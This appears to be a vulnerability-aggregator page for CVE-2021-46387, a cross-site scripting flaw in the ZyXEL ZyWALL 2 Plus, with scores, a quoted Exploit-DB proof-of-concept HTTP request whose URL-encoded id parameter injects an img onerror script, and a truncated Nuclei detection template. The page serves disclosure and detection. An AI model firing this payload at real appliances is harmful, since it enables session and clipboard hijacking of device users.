CVE-2021-46387
published 2022-03-01CVE-2021-46387: ZyXEL ZyWALL 2 Plus Internet Security Appliance is affected by Cross Site Scripting (XSS). Insecure URI handling leads to bypass security restriction to…
PriorityP347medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
EXPLOIT
EPSS
21.03%
97.3th percentile
ZyXEL ZyWALL 2 Plus Internet Security Appliance is affected by Cross Site Scripting (XSS). Insecure URI handling leads to bypass security restriction to achieve Cross Site Scripting, which allows an attacker able to execute arbitrary JavaScript codes to perform multiple attacks such as clipboard hijacking and session hijacking.
CVSS provenance
nvdv3.16.1MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting (XSS)
exploitdb·2022-03-02·CVSS 6.1
CVE-2021-46387 [MEDIUM] Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting (XSS)
Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting (XSS)
---
# Exploit Title: Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting (XSS)
# Date: 1/3/2022
# Exploit Author: Momen Eldawakhly (CyberGuy)
# Vendor Homepage: https://www.zyxel.com
# Version: ZyWALL 2 Plus
# Tested on: Ubuntu Linux [Firefox]
# CVE : CVE-2021-46387
GET /Forms/rpAuth_1?id=%3C/form%3E%3CiMg%20src=x%20onerror=%22prompt(1)%22%3E%3Cform%3E HTTP/1.1
Host: vuln.ip:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Nuclei
Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting
nuclei·CVSS 6.1
CVE-2021-46387 [MEDIUM] Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting
Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting
ZyXEL ZyWALL 2 Plus Internet Security Appliance contains a cross-site scripting vulnerability. Insecure URI handling leads to bypass of security restrictions, which allows an attacker to execute arbitrary JavaScript codes to perform multiple attacks.
Template:
id: CVE-2021-46387
info:
name: Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting
author: DhiyaneshDk
severity: medium
description: ZyXEL ZyWALL 2 Plus Internet Security Appliance contains a cross-site scripting vulnerability. Insecure URI handling leads to bypass of security restrictions, which allows an attacker to execute arbitrary JavaScript codes to perform multiple attacks.
impact: |
Successful exploitation of this vulnerability could
http://packetstormsecurity.com/files/166189/Zyxel-ZyWALL-2-Plus-Cross-Site-Scripting.htmlhttps://drive.google.com/drive/folders/1_XfWBLqxT2Mqt7uB663Sjlc62pE8-rcN?usp=sharinghttps://www.zyxel.com/uk/en/products_services/zywall_2_plus.shtmlhttps://www.zyxel.com/us/en/support/security_advisories.shtmlhttp://packetstormsecurity.com/files/166189/Zyxel-ZyWALL-2-Plus-Cross-Site-Scripting.htmlhttps://drive.google.com/drive/folders/1_XfWBLqxT2Mqt7uB663Sjlc62pE8-rcN?usp=sharinghttps://www.zyxel.com/uk/en/products_services/zywall_2_plus.shtmlhttps://www.zyxel.com/us/en/support/security_advisories.shtml
2022-03-01
Published